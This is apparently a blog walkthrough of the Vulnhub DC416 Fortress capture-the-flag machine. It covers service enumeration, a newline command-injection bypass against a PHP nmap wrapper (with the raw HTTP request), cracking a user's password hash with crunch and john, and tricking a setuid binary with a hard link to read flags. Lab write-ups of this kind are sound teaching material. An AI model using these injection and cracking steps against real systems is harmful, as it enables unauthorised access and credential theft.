Vulnhub - DC416 Fortress Walkthrough

So, I’m here with my first write-up for Vulnhub – DC416 Fortress challenge. So, we usually start by doing some enumeration on services. but before that we have to find out the IP Address of our machine.

Information Gathering

netdiscover will scan all active devices on our network. (Our Target is: 192.168.1.6)

Now, that we know our target IP Address let’s find out which services are running. Nmap scan suggests that server is running FreeBSD and have few services running.

If we take a look at port 80 we have Apache server running so let’s take a look.

There’s nothing on that page i through to curl it to make sure there’s nothing hidden inside but no luck.

Now, it’s time for my favorite part directory enumeration. 🙂

So for that we have some awesome tools installed already in Kali Linux but my favorite is dirb and dirbuster. We had not luck because we couldn’t find any directory so let’s try searching for files. We know server is running Apache so why not give it a try to search for .php extensions.

dirb https://192.168.1.6 /usr/share/dirb/wordlists/big.txt

1	dirb https://192.168.1.6 /usr/share/dirb/wordlists/big.txt

let’s do it!

dirb https://192.168.1.6 /usr/share/dirb/wordlists/big.txt -X .php

1	dirb https://192.168.1.6 /usr/share/dirb/wordlists/big.txt -X .php

And we found our first lead scanner.php file. (https://192.168.1.6/scanner.php) 🙂 let’s take a look.

So we have something here. let’s try to find out what is it?

We have a input field where we enter an IP and it runs Nmap command. Good! 🙂 Maybe we can try command injection here, so let’s take a look at it’s response through Burp.

Read About Command Injection Here: https://www.owasp.org/index.php/Command_Injection

So, we did try command injection looks like there’s some kind of filtration.

POST /scanner.php HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.6/scanner.php
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

host=127.0.0.1;ls

POST /scanner.php HTTP/1.1

Host: 192.168.1.6

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: https://192.168.1.6/scanner.php

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 17

host=127.0.0.1;ls

HTTP/1.1 200 OK
Date: Thu, 08 Mar 2018 23:53:45 GMT
Server: Apache/2.4.23 (FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27
X-Powered-By: PHP/5.6.27
Content-Length: 472
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>S C A N N 3 R</title>
<link rel="stylesheet" href="styles.css" type="text/css" />
</head>
<body>

<div class="container">

<form method="POST" action="">
  <input class="form" type="text" name="host" value="127.0.0.1" />
  <input class="button" type="submit" value="Scan Target" />
</form>
<pre>Command: /usr/local/bin/nmap -F -sT 127.0.0.1;ls

</pre><pre>Nope. Good try though... ð</pre>

<img class="logo" src="logo.png">

</div>
</body>
</html>

HTTP/1.1 200 OK

Date: Thu, 08 Mar 2018 23:53:45 GMT

Server: Apache/2.4.23 (FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27

X-Powered-By: PHP/5.6.27

Content-Length: 472

Connection: close

Content-Type: text/html; charset=UTF-8

<html>

<head>

</head>

<body>

</form>

<pre>Command: /usr/local/bin/nmap -F -sT 127.0.0.1;ls

</pre><pre>Nope. Good try though... ð</pre>

</div>

</body>

</html>

So, this didn’t worked!

host=127.0.0.1;ls

1	host=127.0.0.1;ls

let’s try again!

host=127.0.0.1
ls

1 2	host=127.0.0.1 ls

Awesome!

Now after doing ls -la we found these directories.

k1ngd0m_k3yz
s1kr3t

These two directories looks strange let’s have a look.

total 144
drwxr-xr-x  4 root  wheel    512 Nov  9  2016 .
drwxr-xr-x  6 root  wheel    512 Nov  9  2016 ..
-rw-r--r--  1 root  wheel    561 Nov  8  2016 index.html
drwxr-xr-x  2 root  wheel    512 Nov  9  2016 k1ngd0m_k3yz
-rw-r--r--  1 root  wheel  44867 Nov  4  2016 logo.png
drwxr-xr-x  2 root  wheel    512 Nov  9  2016 s1kr3t
-rw-r--r--  1 root  wheel    759 Nov  5  2016 scanner.php
-rw-r--r--  1 root  wheel    612 Nov  4  2016 styles.css

total 144

drwxr-xr-x 4 root wheel 512 Nov 9 2016 .

drwxr-xr-x 6 root wheel 512 Nov 9 2016 ..

-rw-r--r-- 1 root wheel 561 Nov 8 2016 index.html

drwxr-xr-x 2 root wheel 512 Nov 9 2016 k1ngd0m_k3yz

-rw-r--r-- 1 root wheel 44867 Nov 4 2016 logo.png

drwxr-xr-x 2 root wheel 512 Nov 9 2016 s1kr3t

-rw-r--r-- 1 root wheel 759 Nov 5 2016 scanner.php

-rw-r--r-- 1 root wheel 612 Nov 4 2016 styles.css

k1ngd0m_k3yz

-rw-r--r--  1 root  wheel  157 Nov  9  2016 master
-rw-r--r--  1 root  wheel   47 Nov  9  2016 passwd

1 2	-rw-r--r-- 1 root wheel 157 Nov 9 2016 master -rw-r--r-- 1 root wheel 47 Nov 9 2016 passwd

s1kr3t

-rw-r--r--  1 root  wheel   31 Nov  4  2016 flag.txt

1	-rw-r--r-- 1 root wheel 31 Nov 4 2016 flag.txt

Now, let’s take a look inside master and passwd files.

Inside master file we have our hash. Save that to hash.txt just in case we couldn’t get any further lead.

craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh

1	craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh

Inside passwd file.

craven:*:1002:1002:User &:/home/craven:/bin/sh

1	craven:*:1002:1002:User &:/home/craven:/bin/sh

flag1

The first flag can be found in the s1kr3t directory.

cat s1kr3t/flag.txt
FLAG{n0_one_br3aches_teh_f0rt}

1 2	cat s1kr3t/flag.txt FLAG{n0_one_br3aches_teh_f0rt}

Finally, we have found our first flag.

From our previous findings we have found that there’s a user account named craven.

ls -la /home/craven/

-r--------  1 craven  craven    46 Nov  6  2016 flag.txt
-rw-r--r--  1 craven  craven   119 Nov  5  2016 hint.txt
-rw-r--r--  1 craven  craven    77 Nov  5  2016 reminders.txt

-r-------- 1 craven craven 46 Nov 6 2016 flag.txt

-rw-r--r-- 1 craven craven 119 Nov 5 2016 hint.txt

-rw-r--r-- 1 craven craven 77 Nov 5 2016 reminders.txt

Look’s like we have found our second flag inside /home/craven/ directory.

We do not have read permission for flag.txt and now let’s take a look at hint.txt and reminders.txt files.

hint.txt

Keep forgetting my password, so I made myself a hint. Password is three digits followed by my pet's name and a symbol.

reminders.txt

To buy: * skim milk * organic free-run eggs * dog bone for qwerty * sriracha

Now, that we have a hint and hint suggests that his dog name is: qwerty we’re gonna add three digits before qwerty and one symbol after and that can be done through crunch wordlist generator.

Qwerty
3 digits
Symbol

crunch 10 10 -t %%%qwerty^ > pass.txt

1	crunch 10 10 -t %%%qwerty^ > pass.txt

This command will create every possible word.

Now, we have to crack hash.txt hash that we found earlier.

john -wordlist=pass.txt hash.txt

1	john -wordlist=pass.txt hash.txt

It seems that we have successfully cracked our password. 🙂

931qwerty?

Boom!

Now we’re able to get our second flag.

$ pwd
/usr/home/craven
$ ls
flag.txt	hint.txt	reminders.txt
$ cat flag.txt 
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

$ pwd

/usr/home/craven

$ ls

flag.txt hint.txt reminders.txt

$ cat flag.txt

FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

flag2

FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

1	FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

It’s time to get our third flag.

I did cd /home and found another user name: vulnhub. We can spot a suid binary from the user vulnhub in it’s home directory /home/vulnhub.

$ ls
craven	vulnhub
$ pwd
/usr/home

$ ls

craven vulnhub

$ pwd

/usr/home

Inside vulnhub directory we have our third flag and reader file.

$ ls
flag.txt	reader

1 2	$ ls flag.txt reader

By doing file reader we have some info about reader file.

reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped

1	reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped

Since we can execute reader file as carven user we can read our third flag let’s try. 🙂

It seems the binary checks the filename for flag.txt so let’s try to trick this check with a symbolic link:

Now to a hard link. (https://www.computerhope.com/unix/uln.htm)

Boom! 🙂

flags3

FLAG{its_A_ph0t0_ph1ni5h}

1	FLAG{its_A_ph0t0_ph1ni5h}